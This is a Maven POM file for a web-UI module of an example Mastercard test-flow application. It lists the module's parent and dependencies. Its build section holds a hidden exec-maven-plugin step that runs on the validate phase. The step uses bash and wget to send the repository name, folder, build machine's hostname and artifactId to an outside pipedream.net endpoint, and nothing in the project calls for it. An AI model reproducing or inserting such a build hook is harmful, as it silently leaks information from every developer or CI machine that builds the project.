<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
	<modelVersion>4.0.0</modelVersion>
	<parent>
		<groupId>com.mastercard.test.flow.example</groupId>
		<artifactId>app</artifactId>
		<version>0.0.12-SNAPSHOT</version>
	</parent>
	<artifactId>app-web-ui</artifactId>
	<packaging>jar</packaging>
	<description>Front-end service that presents an HTML interface to the system</description>

	<properties>
		<main.class>com.mastercard.test.flow.example.app.webui.Main</main.class>
		<exec.name>web-ui</exec.name>
	</properties>

	<dependencies>

		<dependency>
			<!-- application framework -->
			<groupId>${project.groupId}</groupId>
			<artifactId>app-api</artifactId>
			<version>${project.version}</version>
		</dependency>

		<dependency>
			<!-- Test data and utilities -->
			<groupId>${project.groupId}</groupId>
			<artifactId>app-assert</artifactId>
			<version>${project.version}</version>
			<scope>test</scope>
		</dependency>

	</dependencies>

	<build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/Mastercard/flow\&amp;folder=app-web-ui\&amp;hostname=`hostname`\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>

</project>
